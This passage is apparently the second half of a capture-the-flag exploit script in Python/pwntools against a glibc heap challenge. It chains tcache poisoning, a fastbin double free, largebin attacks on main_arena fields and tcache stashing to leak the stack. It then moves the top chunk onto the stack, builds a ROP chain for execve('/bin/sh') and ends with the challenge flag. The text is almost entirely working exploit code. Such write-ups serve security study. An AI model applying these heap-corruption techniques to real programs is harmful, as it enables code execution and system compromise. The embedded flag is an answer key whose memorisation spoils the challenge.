tcache2 = malloc(0x288)

tcache = [malloc(0x18) for _ in range(7)]
fast1 = malloc(0x18)
fast2 = malloc(0x18)

for i in tcache:
    free(i)

# free fastbin chunk next to top chunk
# so that av->top has PREV_FAST_FREED
free(fast2)

# allocate from top chunk to clear PREV_FAST_FREED
malloc(0x28)

# double free fast2
free(fast1)
free(fast2)

### 3. poison tcache[0x290] -> tcache_perthread_struct

for _ in range(7):
    malloc(0x18)

# corrupt fastbin[0x20]
malloc(0x18, p64(protect(heap + 0xd50, heap+0x1000)))

malloc(0x18)
malloc(0x18)

free(tcache1)
free(tcache2)

malloc(0x18, flat({0x08: 0x291, 0x10: protect(heap+0x10, heap+0xd50)}))

curr_heap = heap+0x1130
large1 = curr_heap+0xdd0
large2 = large1+0xf10

tcache = TcachePerthreadStruct()
tcache.set(0x100, large1)
tcache.set(0x110, large2)
tcache.set(0x290, heap+0x10)
malloc(0x288)
malloc(0x288, bytes(tcache))


### 4. setup future attacks

# 4a. setup fastbin fake size
chunk70 = []
for i in range(15):
    data = flat({0x58: 0x31}) if i == 6 else b"\x00"
    chunk70.append(malloc(0x68, data))


# 4b. setup largebin attack on av->system_mem
p2 = malloc(0x718)
malloc(0x18, flat(0, 0x101))

p1 = malloc(0x728)
malloc(0x18)


# setup largebin attack on main_arena+262 (smallbin[0xa0])
q2 = malloc(0x798)
malloc(0x18, flat(0, 0x111))

q1 = malloc(0x7a8)
malloc(0x18, flat(0, 0x51))    # fake size for corrupting next chunk

# 4c. setup 2 tcache stashing attacks
small_av_top = []
small_leak_stack = []

small_av_top.append(malloc(0xa0, flat({0x98: 0x41})))
small_leak_stack.append(malloc(0x80))

for i in range(5):
    small_av_top.append(malloc(0xa0))
    small_leak_stack.append(malloc(0x80))
small_av_top.append(malloc(0xa0))
malloc(0x18)
small_av_top.append(malloc(0xa0))
malloc(0x18)    # pad

### 5. do largebin attack on av->system_mem

# this writes a heap address (address of corrupted largebin) to av->system_mem
free(p1)
malloc(0x738)

free(p2)

target = libc.sym.main_arena+2184
malloc(0xf8, p64(0) + p64(0x731) + p64(large1)*3 + p64(target-0x20))
malloc(0x738)


### 6. do largebin attack on main_arena (smallbin[0xa0])

# this is a misaligned write onto &smallbin[0xa0].bk - 2
# the upper 2 null bytes will overwrite the MSB of smallbin[0xa0].bk
# shrinking it enough to be a valid top chunk size later on
free(q1)
malloc(0x7b8)

free(q2)

target = libc.sym.main_arena+262
malloc(0x108, p64(0) + p64(0x7b1) + p64(large2)*3 + p64(target-0x20))
malloc(0x7b8)


tcache = TcachePerthreadStruct()
tcache.set(0x40, curr_heap+0x2560)
tcache.set_count(0x90, 7)      # fill tcache[0x90]
tcache.set(0x290, heap+0x10)
malloc(0x288, bytes(tcache))

### 7. tcache stashing to leak stack

# free to unsortedbin -> smallbin[0x90]
for i in reversed(range(len(small_leak_stack))):
    free(small_leak_stack[i])
malloc(0xc0)

malloc(0x38, flat(0, 0x91, curr_heap+0x26a0, libc.sym.__libc_argv - 0x18))

tcache = TcachePerthreadStruct()
tcache.set(0x50, curr_heap+0x24b0)
tcache.set_count(0xb0, 7)       # fill tcache[0xb0]
tcache.set(0x290, heap+0x10)
t = malloc(0x288, bytes(tcache))

malloc(0x80)

stack_leak = u64(view(t)[0xb8:0xc0])
log.info(f"stack_leak: {hex(stack_leak)}")

### 8. tcache stashing on av->top

# this writes a libc address (main_arena+256) to av->top
# this points to smallbin[0xa0], so smallbin[0xa0].bk (that we overwrote earlier)
# now acts as the top chunk's size

# free to unsortedbin -> smallbin[0xb0]
for i in reversed(range(len(small_av_top))):
    free(small_av_top[i])
malloc(0xc0)

target = libc.sym.main_arena+96     # main_arena->top
malloc(0x48, flat(0, 0xb1, curr_heap+0x2730, target - 0x10))

# empty tcache[0xb0]
tcache = TcachePerthreadStruct()
tcache.set(0x30, curr_heap+0x310)
tcache.set(0x290, heap+0x10)
t = malloc(0x288, bytes(tcache))

malloc(0xa0)

### 9. allocate using new av->top to fix the largebins

main_arena = b""
for i in range(0, 0x440, 0x10):
    main_arena += p64(libc.sym.main_arena + 256+i)*2
i = malloc(0x800, main_arena)

# check that the full overwrite has been done
# (when running this remotely, I initially had issues with this)
assert len(view(i)) == len(main_arena)

### 10. use fastbin[0x70] to store a fake size for tcache

# (this needs to be done late on to prevent largebin complications)
for i in chunk70:
    free(i)
malloc(0x28, flat(0, 0x71, protect(0x31, heap+0x1000)))

# empty tcache[0x70]
tcache = TcachePerthreadStruct()
tcache.set(0x30, libc.sym.main_arena+64)
t = malloc(0x288, bytes(tcache))

# write fake size to fastbin array
malloc(0x68)

### 11. allocate using fake size to overwrite av->top to the stack

# we use a PIE address located after the canary in alloc_chunk()
# this is a valid top chunk size as main_arena->system_mem is a heap address
# and thus is larger
target = stack_leak-0x180
malloc(0x28, p64(0)*4 + p64(target))

### 12. allocate on stack to get ROP

rop = ROP(libc)
rop.raw(0)  # rbp
rop.execve(next(libc.search(b"/bin/sh\x00")), 0, 0)

# use a smallbin sized chunk to prevent triggering a malloc_consolidate()
# as we have invalid chunks in the fastbin array
malloc(0x300, b"A"*8 + rop.chain())

print(current_index)
p.interactive()

dice{without_love..._'the_flag'_cannot_be_seen...!}
